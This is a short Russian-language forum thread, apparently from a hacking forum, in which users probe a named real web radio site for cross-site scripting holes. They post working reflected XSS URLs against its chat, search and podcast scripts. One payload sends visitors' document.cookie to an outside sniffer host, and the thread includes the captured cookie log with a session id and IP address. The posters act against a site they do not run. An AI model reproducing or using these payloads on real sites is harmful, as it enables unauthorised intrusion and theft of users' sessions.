Чаты Chat на айпод.

http://www.ipodradio.ru/cgi-bin/chat.cgi?room=227

проверим веб чат на дырки. флудилки достали, админ редко появляетя а модера ничего не могут сделать...

 

Ну что никто не пробовал...придётся одному возиться...

 

http://www.ipodradio.ru/cgi-bin/search.cgi?search=%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E

На те пассивную xss, радуйся =)

 

Code:

http://www.ipodradio.ru/cgi-bin/chat.cgi?room=%22%3E%3Cscript%3Ealert()%3C/script%3E

 

Благодарствую тебя познающий !!!

 

Эта пассивная на подкасты выводит...

 

Вот еще одна...
_http://www.ipodradio.ru/cgi-bin/podcasts.cgi?t=%3Cfont%20color=red%3EPREVED</div><br><br><br><script>alert('hello world')</script>

 

Вот Активная можно заснифать свои куки ! =)

HTML:

Запрос с www.ipodradio.ru (05.01.2007 18:53)	
IP: 217.149.16.77 
QUERY: =b=b; cinfo=Has component: undefined; version: undefined; has ajax: yes; xsid=4d315f550695126b5bf2e204e7882474
REFERER: http://www.ipodradio.ru/cgi-bin/search.cgi?search="><script>img = new Image(); img.src = "http://antichat.org/s/JFKenedi.gif?="+document.cookie;</script><input type="hidden&sby=podcast&x=0&y=0
AGENT: Opera/8.01 (Windows NT 5.1; U; ru)

 

это пасивка

 

мда...

причем

и

это одно и то же

 

Не получилосс заснифать...

 

Ну у меня куи на сниффер ушли...

=b=b;
cinfo=Has component:
undefined; version:
undefined; has ajax:
yes;
xsid=4d315f550695126b5bf2e204e7882474

Вот Адрес сниффера
http://antichat.org/s/JFKenedi/log.php